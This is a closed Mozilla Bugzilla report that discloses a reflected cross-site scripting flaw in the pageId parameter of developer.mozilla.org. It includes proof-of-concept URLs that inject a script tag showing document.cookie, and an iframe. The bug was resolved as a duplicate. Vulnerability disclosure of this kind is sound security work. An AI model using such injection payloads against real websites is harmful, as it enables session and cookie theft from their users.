Closed Bug 636138 Opened 13 years ago Closed 13 years ago

developer.mozilla.org ) XSS

Tracking

(Not tracked)

Status:

RESOLVED DUPLICATE of bug 622996

People

(Reporter: d3v1l.securityshell, Unassigned)

Details

marius

Reporter

Description

•

13 years ago

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 ( .NET CLR 3.5.30729; .NET4.0E)
Build Identifier: 

Mozilla Developer Network   ( https://developer.mozilla.org )



poc:


https://developer.mozilla.org/index.php?title=Special:Tags&pageId=60047'"--></style></script><script>alert(document.cookie)</script> 
              

https://developer.mozilla.org/index.php?title=Special:Tags&pageId=60047'"--></style></script>><iframe src=index.htm 

screenshots: 


http://i55.tinypic.com/2wekzyp.jpg


http://i51.tinypic.com/14mbfjd.jpg

Reproducible: Always

Michael Coates [:mcoates] (acct no longer active)

Updated

•

13 years ago

Status: UNCONFIRMED → RESOLVED

Closed: 13 years ago

Resolution: --- → DUPLICATE

Nobody; OK to take it and work on it

Assignee

Updated

•

12 years ago

Component: Website → Landing pages

Will Kahn-Greene [:willkg] ET needinfo? me

Comment 2

•

8 years ago

For bugs that are resolved, we remove the security flag. These haven't had their flag removed, so I'm removing it now.

Group: websites-security

BMO Automation

Updated

•

4 years ago

Product: developer.mozilla.org → developer.mozilla.org Graveyard

You need to log in before you can comment on or make changes to this bug.

Bugzilla

Quick Search

Mozilla Developer Network ( https://developer.mozilla.org ) XSS

Categories

(developer.mozilla.org Graveyard :: Wiki pages, defect)

Tracking

(Not tracked)

People

(Reporter: d3v1l.securityshell, Unassigned)

References

Details

Crash Data

Security

(public)

User Story

Description

Updated

Updated

Comment 2

Updated